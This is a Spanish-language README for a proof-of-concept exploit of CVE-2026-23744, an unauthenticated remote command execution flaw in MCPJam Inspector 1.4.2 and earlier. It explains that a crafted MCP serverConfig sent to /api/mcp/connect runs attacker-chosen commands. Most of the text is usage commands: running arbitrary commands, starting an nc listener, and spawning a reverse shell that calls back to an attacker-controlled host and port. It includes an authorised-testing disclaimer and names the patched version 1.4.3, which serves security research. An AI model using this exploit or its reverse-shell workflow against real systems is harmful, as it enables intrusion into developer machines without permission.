
Prueba de concepto de ejecución remota de código sin autenticación para CVE-2026-23744 dirigida a MCPJam Inspector. Genera payloads MCP serverConfig diseñados para explotar el endpoint /api/mcp/connect con soporte de reverse shell y depuración en seco (dry-run).
PoC de ejecución remota de código no autenticada para CVE-2026-23744. MCPJam Inspector 1.4.2 y versiones anteriores exponen funcionalidad a través de /api/mcp/connect que puede lanzar un comando de servidor MCP controlado por el atacante sin autenticación.
Solo para pruebas autorizadas e investigación. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig de MCP manipulado./api/mcp/connect.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
Primero inicia un listener:
rlwrap nc -lvnp 4444
Después ejecuta:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
Opciones útiles:
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
| Producto | Versión afectada | Acceso requerido | Impacto |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | Ninguno | Ejecución remota de comandos como el usuario del proceso de MCPJam Inspector |
El problema es especialmente crítico cuando MCPJam Inspector escucha en 0.0.0.0, lo que permite que hosts remotos alcancen el servicio de desarrollo.
/api/mcp/connect.serverConfig.command y serverConfig.args.--cmd para una validación segura antes de intentar una reverse shell.--dry-run --debug para inspeccionar la solicitud generada sin tocar un objetivo.1.4.3 contiene el parche oficial según NVD.ozcanpng — github.com/ozcanpng — ozcanpng.dev